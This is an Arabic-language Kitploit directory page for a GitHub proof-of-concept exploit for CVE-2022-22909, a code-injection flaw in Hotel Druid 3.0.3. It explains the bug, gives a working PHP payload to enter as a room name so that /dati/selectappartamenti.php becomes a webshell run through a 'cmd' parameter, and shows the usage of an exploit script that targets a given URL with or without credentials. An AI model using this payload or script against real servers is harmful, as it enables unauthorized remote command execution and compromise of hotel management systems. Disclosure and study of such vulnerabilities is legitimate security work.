Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22909 — Hotel Druid 3.0.3 حقن الكود إلى تنفيذ الأوامر عن بعد | Kitploit
أدوات/GitHubGitHub/0z09e/cve-2022-22909
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHub0z09e/cve-2022-22909

CVE-2022-22909

Hotel Druid 3.0.3 حقن الكود إلى تنفيذ الأوامر عن بعد

عرض المستودع
55منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-22909

الوصف

تم العثور على ثغرة أمنية من نوع حقن الكود (Code Injection) في تطبيق Hotel Druid v3.0.3، يمكن للمهاجم استغلالها لتنفيذ أوامر عن بُعد على الخادم. للاستغلال الناجح، يجب أن يمتلك المهاجم صلاحية إضافة غرفة جديدة.

وصف الثغرة الأمنية

تحدث الثغرة لأن أسماء الغرف تُخزَّن داخل ملف باسم /dati/selectappartamenti.php باستخدام العلامات المزدوجة (Double Quotes).

root@kitploit:~
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

الحمولة

للاستغلال الناجح، قم بإضافة غرفة بالحمولة التالية كاسم للغرفة.

root@kitploit:~
{${system($_REQUEST[cmd])}}

بعد إضافة غرفة جديدة، انتقل إلى /dati/selectappartamenti.php وقم بتفعيل الـ webshell عن طريق تمرير أمر باستخدام المعامل .

cmd

الاستخدام

root@kitploit:~
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

مثال

إذا كان التطبيق لا يتطلب مصادقة. استخدم العَلَم --noauth لعدم إجراء مصادقة.

إذا كان الخادم يتطلب مصادقة، استخدم --username و --password لإجراء المصادقة.

الإسناد

الباحث وكاتب الإثبات (POC) - 0z09e


تنزيل الأداة